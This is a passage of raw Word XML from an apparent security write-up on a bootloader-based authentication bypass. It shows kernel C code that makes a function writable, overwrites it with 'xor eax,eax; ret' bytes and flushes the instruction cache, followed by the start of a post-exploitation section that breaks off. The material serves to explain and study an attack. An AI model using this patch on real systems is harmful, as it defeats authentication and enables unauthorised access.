      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ZwProtectVirtualMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>NtCurrentProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E8D014" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FunctionAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B83425E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>RegionSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595E557" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428C289A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>OldProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15FE684D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="234" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF408F8" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Perform inline patch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C08F85F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="237" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">UCHAR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Patch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>x31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0xC</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>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xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">; ret </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>memcpy</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FunctionAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Patch</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b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Patch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D2C07" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Restore protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FEE860" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1281" w:right="3452" w:hanging="418"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ZwProtectVirtualMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>NtCurrentProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482590ED" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FunctionAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6435BD12" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>RegionSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA347BB" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>OldProtect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>LowPart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F03DC3A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="1292" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>OldProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72246A52" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="234" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0FB00A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Flush instruction cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E17155" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="873" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ZwFlushInstructionCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>NtCurrentProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="40A170"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C5B3E7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28937F95" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="241" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KeUnstackDetachProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ApcState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9248BA" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>STATUS_SUCCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFCD9FE" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="65" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243B79F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="370" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1745" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="152316E3" wp14:editId="7E31C8BE">
                <wp:extent cx="2182571" cy="6326"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="16375" name="Group 16375"/>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141" name="Shape 1141"/>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375" style="width:171.856pt;height:0.4981pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="21825,63">
                <v:shape id="Shape 1141" style="position:absolute;width:21825;height:0;left:0;top:0;" coordsize="2182571,0" path="m0,0l2182571,0">
                  <v:stroke weight="0.4981pt" endcap="flat" joinstyle="miter" miterlimit="10" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE81A24" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="333" w:right="673" w:hanging="321"/>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation: The Authentication Bypass in Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453FA694" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="393" w:lineRule="auto"/>
        <w:ind w:left="14" w:right="5734"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 The Attack Sequence </w:t>
      </w:r>
      <w:r>
        <w:t>Once the patch is in place:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E64AE4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">User boots the system normally </w:t>
      </w:r>
      <w:r>
        <w:t>(without the external media)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3DF79" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="4"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Normal kernel loads </w:t>
      </w:r>
      <w:r>
        <w:t>(the malicious bootloader is no longer active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01310C36" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="2" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="1471" w:hanging="255"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
